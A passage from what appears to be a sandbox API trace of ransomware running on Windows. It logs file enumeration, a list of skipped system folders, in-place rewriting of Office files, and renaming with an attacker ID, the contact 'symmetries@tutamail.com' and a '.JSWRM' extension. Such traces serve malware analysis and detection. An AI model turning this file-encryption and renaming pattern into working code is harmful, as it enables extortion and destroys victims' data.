Size=0x20) returned 0x240ef8 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMailRead.nrr", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMailRead.nrr", lpUsedDefaultChar=0x0) returned 25 [0121.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0121.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMailRead.nrr", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMailRead.nrr", cchWideChar=25, lpMultiByteStr=0x240f48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMailRead.nrr", lpUsedDefaultChar=0x0) returned 25 [0121.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0121.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMailRead.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmailread.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.688] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=269024) returned 1 [0121.688] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.688] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.700] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.700] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.701] CloseHandle (hObject=0x238) returned 1 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0121.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0121.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0121.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0121.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0121.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMailRead.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmailread.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMailRead.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmailread.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0121.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0121.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.702] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3fdb4, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookMeetingReqRead.nrr", cAlternateFileName="TE0A80~1.NRR")) returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2=".") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="..") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="...") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="windows") returned -1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="recovery") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="perflogs") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="documents and settings") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="system volume information") returned 1 [0121.702] lstrcmpiW (lpString1="TellMeOutlookMeetingReqRead.nrr", lpString2="msocache") returned 1 [0121.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0121.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqRead.nrr", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0121.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqRead.nrr", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMeetingReqRead.nrr", lpUsedDefaultChar=0x0) returned 31 [0121.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0121.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0121.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqRead.nrr", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0121.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqRead.nrr", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMeetingReqRead.nrr", lpUsedDefaultChar=0x0) returned 31 [0121.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0121.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0121.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqRead.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqread.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.731] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=261556) returned 1 [0121.732] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.732] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.759] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.759] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.760] CloseHandle (hObject=0x238) returned 1 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0121.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0121.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0121.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0121.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0121.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqRead.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqread.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqRead.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqread.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0121.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0121.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0121.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.762] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f7c0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookMeetingReqSend.nrr", cAlternateFileName="TEA8CF~1.NRR")) returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2=".") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="..") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="...") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="windows") returned -1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="recovery") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="perflogs") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="documents and settings") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="system volume information") returned 1 [0121.762] lstrcmpiW (lpString1="TellMeOutlookMeetingReqSend.nrr", lpString2="msocache") returned 1 [0121.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0121.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqSend.nrr", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0121.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqSend.nrr", cchWideChar=31, lpMultiByteStr=0x240fe8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMeetingReqSend.nrr", lpUsedDefaultChar=0x0) returned 31 [0121.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0121.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0121.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqSend.nrr", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0121.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookMeetingReqSend.nrr", cchWideChar=31, lpMultiByteStr=0x240ef8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookMeetingReqSend.nrr", lpUsedDefaultChar=0x0) returned 31 [0121.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0121.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0121.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0121.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0121.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqSend.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqsend.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.764] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=260032) returned 1 [0121.764] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.764] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.775] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.775] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.776] CloseHandle (hObject=0x238) returned 1 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0121.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0121.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0121.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0121.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0121.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.776] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqSend.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqsend.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqSend.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqsend.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.778] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3dd60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookTask.nrr", cAlternateFileName="TE5BFE~1.NRR")) returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2=".") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="..") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="...") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="windows") returned -1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="recovery") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="perflogs") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="documents and settings") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="system volume information") returned 1 [0121.778] lstrcmpiW (lpString1="TellMeOutlookTask.nrr", lpString2="msocache") returned 1 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 